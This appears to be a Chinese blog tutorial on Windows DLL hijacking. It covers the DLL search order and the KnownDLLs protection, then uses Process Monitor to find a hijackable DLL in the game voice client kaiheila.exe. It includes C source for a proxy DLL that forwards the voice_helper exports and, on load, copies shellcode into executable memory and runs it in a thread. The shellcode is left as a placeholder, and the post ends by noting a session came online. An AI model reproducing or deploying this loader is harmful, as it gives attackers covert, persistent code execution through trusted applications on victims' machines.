dll劫持是比较经典,也是比较老的技术,但到目前位置依然能用。
具体原理就是某些exe需要加载dll,而查找dll的目录顺序如下:
所以如果一个dll不在应用程序所在目录
,那么我们可以在应用程序所在目录
放一个我们自己的dll,名称改为要加载dll的名称,这样当程序启动时,程序会加载我们自己的dll。当然这里只是简单的说了一种情况,某些情况下,即便正常dll存在,我们也可以通过dll劫持转发的方式劫持,目前不少厂商已经通过hash,MD5校验或数字签名验证等方式确保加载的dll为自己的dll,这会是即便你找到了相关可利用的dll劫持但还是失败的原因之一。
Windows 7之后:
微软为了更进一步的防御系统的DLL被劫持,将一些容易被劫持的系统DLL写进了一个注册表项中,那么凡是此项下的DLL文件就会被禁止从EXE自身所在的目录下调用,而只能从系统目录即SYSTEM32目录下调用。注册表路径如下:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs
本机win11的knownDLLs
分析一个应用程序是否存在劫持系统DLL的漏洞,通常需要几个步骤:
最近游戏玩的比较多,用开黑啦试一下
使用process Monitor Filter
对kaiheila.exe
进程进行监控
这里找到一个成功加载的
然后再重新执行程序,这里同样是弹出了窗口
能够成功劫持,但劫持后影响正常程序运行
#include <Windows.h>
#include <stdlib.h>#pragma comment(linker, "/EXPORT:RegisterHookListener=voice_helperOrg.RegisterHookListener,@1")
#pragma comment(linker, "/EXPORT:RemoveAllListeners=voice_helperOrg.RemoveAllListeners,@2")
#pragma comment(linker, "/EXPORT:StartHelperService=voice_helperOrg.StartHelperService,@3")
#pragma comment(linker, "/EXPORT:StopHelperService=voice_helperOrg.StopHelperService,@4")
HANDLE hThread = NULL;
typedef void(__stdcall* JMP_SHELLCODE)();
/* length: 894 bytes */
unsigned char shellcode[] = "SHELLCODE";
DWORD WINAPI jmp_shellcode(LPVOID pPara)
{
LPVOID lpBase = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(lpBase, shellcode, sizeof(shellcode));
JMP_SHELLCODE jmp_shellcode = (JMP_SHELLCODE)lpBase;
jmp_shellcode();
return 0;
}
BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved)
{
if (dwReason == DLL_PROCESS_ATTACH)
{
DisableThreadLibraryCalls(hModule);
hThread = CreateThread(NULL, 0, jmp_shellcode, 0, 0, 0);
}
else if (dwReason == DLL_PROCESS_DETACH)
{
}
return TRUE;
}
uu语音上线